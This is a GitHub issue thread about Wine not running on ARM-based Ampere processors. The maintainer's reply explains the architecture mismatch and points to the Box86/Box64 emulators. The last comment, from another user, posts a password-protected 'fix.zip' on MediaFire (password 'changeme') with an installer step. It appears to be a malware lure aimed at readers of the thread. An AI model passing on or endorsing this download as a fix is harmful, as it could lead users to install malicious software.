### ISSUE TITLE
Wine does not work on Ampere processors

### ISSUE THREAD

**Issue by Sterbweise** [Sterbweise/T6Server#2]
I can't launch the games server because of my processor.

Issues raised by @nakero77

**Comment by Sterbweise** [comment]
## Problem:
When using Wine on systems with Ampere processors, Wine does not function correctly.

## Details:
Ampere processors are based on the ARM architecture, which causes compatibility issues with Wine. Since Wine is designed to run Windows applications compiled for the x86/x86_64 architecture, it encounters difficulties on ARM environments like those of Ampere processors.

**Steps to Reproduce the Issue:**
- Install Wine on a system with an Ampere processor.
- Attempt to run a Windows application.

**Expected Behavior:**
- The Windows application should launch normally.

**Observed Behavior:**
- The application does not launch, or significant errors occur.

**Possible Solution:**
To work around this issue, an emulation layer is required. Here’s how you can proceed:
- Install Box86 (for 32-bit applications) and Box64 (for 64-bit applications).
- Configure Wine to use Box86/Box64 when running Windows applications.
- Launch the application via Wine using the Box86/Box64 emulators.

More details on installing and configuring Box86 and Box64 can be found in their respective documentation or forums.

## References:
- [Box86 GitHub Repository](https://github.com/ptitSeb/box86)
- [Box64 GitHub Repository](https://github.com/ptitSeb/box64)

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
